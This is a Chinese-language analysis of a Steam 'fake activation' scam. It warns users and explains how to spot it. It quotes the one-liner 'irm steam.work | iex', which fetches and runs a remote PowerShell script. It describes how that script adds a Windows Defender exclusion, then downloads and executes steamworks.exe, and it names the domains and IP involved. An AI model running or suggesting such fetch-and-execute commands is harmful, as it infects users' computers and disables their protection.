Steam假入库深度分析：原理、危害与防范指南

Steam假入库深度分析：原理、危害与防范指南

Steam假入库是一种常见的网络诈骗手段，通过恶意软件和伪装的界面欺骗用户输入正版CDK，进而盗取用户财产。本文将详细分析假入库命令的工作原理、恶意软件的行为以及预防措施，帮助读者识别和防范此类诈骗。

假入库命令分析

假入库命令：irm steam.work | iex

1. irm指令向指定网站发送请求，并返回信息
2. iex指令在本地计算机上执行命令
3. 整体作用：首先使用irm命令从指定网站获取到命令脚本，通过管道（|）将获取到的命令传递给iex执行。由于使用终端使用管理员权限打开，所以下面的危险命令都会顺利执行。

假入库脚本分析

从steamcdk.link获取，steam.work目前已经解析到官网

1. 打印信息：首先通过Write-Host命令打印steam的logo以及名字
2. 权限检查：判断当前终端是否使用管理员权限打开，S-1-5-32-544为Windows内置管理员组的SID。如果不是管理员权限打开，则提示用户
3. 通过查找注册表信息获取到steam安装路径

• 例如最终获得的steamPath为C:/programs/steam

4. 判断Windows Defender状态：如果开启，则将steam路径加入其排除路径，并指定不扫描该路径下的dll与exe文件
5. 下载病毒文件，并执行：从指定链接下载一个名为“steamworks.exe“的文件，保存到steam安装路径下，并直接执行该文件。

Steamworks.exe分析

• 文件正版steam安装路径下并不会存在该文件，此程序为盗版假入库的验证程序。通过将商家cdk发送到后台API进行验证，判断该cdk是否正确（自己做的后台，管理并生成盗版cdk，并通过自己的后台进行验证）。之后应该会根据返回结果来欺骗steam来下载游戏，实现假入库。但是本人技术有限，无法对exe文件进行逆向分析。
• 通过抓包发现，输入盗版cdk之后，该exe文件会向“111.230.239.121“发起一个GET请求。接口为”/cdk.php”，请求参数为”cdk=盗版cdk值进行后台校验”。

涉及到的域名

做这种东西居然都用的国内服务器，并且还使用在工信部进行备案过的域名，可以查到两个域名均为企业备案，并可以查询到相应的工商登记信息。

1. Steam.work

• 假入库脚本请求域名
• steam.work ICP备案信息
• steam.work 备案主体工商登记信息

2. Haory.cn

• 假入库文件下载域名
• haory.cn ICP备案信息
• haory.cn 备案主体工商登记信息

检查以及预防

假入库这种方式会在steam安装目录下加入其他文件，如此脚本中下载的“steamworks.exe“，还有部分帖子提到的”hid.dll“。同时可以检查Windows Defender等自己电脑上的安全管理软件是否把steam目录加入了排除扫描目录。

其实只要掌握好管理员权限就不会发生这种情况，正常玩家玩游戏以及官方入库是不会涉及到使用管理员权限的。

Steam入库不需要使用第三方脚本或者软件，直接进入steam从左下角添加游戏->在steam上激活产品。当然，要是找不到这个选项可能你的steam自己也存在问题。

下面两幅图是盗版激活与正版激活的界面，仔细观察也是存在差异的，包括分辨率以及字体、背景颜色等。尤其是正版激活界面不输入cdk，确认按钮不会变蓝色，盗版始终为蓝色。

盗版入库界面

正版入库界面